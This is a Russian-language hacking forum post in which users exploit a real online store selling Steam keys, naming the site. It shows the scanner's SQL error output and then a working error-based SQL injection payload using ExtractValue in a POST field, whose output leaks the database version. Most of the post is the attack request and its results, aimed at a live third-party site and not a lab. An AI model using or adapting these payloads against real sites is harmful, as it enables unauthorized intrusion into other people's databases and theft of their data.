30.09.2015, 23:43
|
|
Новичок
Регистрация: 04.06.2015
Сообщений: 22
С нами:
5759606
Репутация:
0
|
|
Сообщение от SaNDER
↑
POST /confirm_buying HTTP/1.1 Content-Length: 353 Content-Type: application/x-www-form-urlencoded Referer:
http://steamplay.ru:80/
А вот то что сканер видит :
Код:
A Database Error Occurred
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"'' at line 1
UPDATE `items` SET `views` = `views` + 1 WHERE `digiseller_id` = '1'"'
Filename: /home/s/steampxb/steampxb.bget.ru/public_html/helpers/top10_helper.php
Line Number: 30
Но вот,что странно
Response показывает это :
Код:
HTTP/1.1 500 Internal Server Error Server: nginx/1.9.4 Date: Wed, 30 Sep 2015 08:24:41 GMT Content-Type: text/html Content-Length: 1500 Connection: keep-alive Keep-Alive: timeout=30 X-Powered-By: PHP/5.4.44
.
В Acunetix есть HTTP Editor, там будет id_goods=1, через XPATH
Код:
csrf_ytse_token=01cc4a2e39c048f58f725bfe26e5d57c&failpage=http://steamplay.ru
/&goods_title=BRILLIANT%20STEAM%20%d0%ba%d0%bb%d1%8e%d1%87%20%2b%5b
%20CS%20GO%20Arma%20DAYZ%20GTA%20%5d%2b%20%d0%9f%d0%9e%d0%94%d0%90
%d0%a0%d0%9a%d0%98&id_agent=390191&id_goods=1'or(ExtractValue(0x3a,concat(0x3a,(select version()))))='&price=15&thumbnail=1910800.jpg&token=27091&type_curr=WMR
XPATH syntax error: ':5.6.26-74.0-beget-log'
|
|
|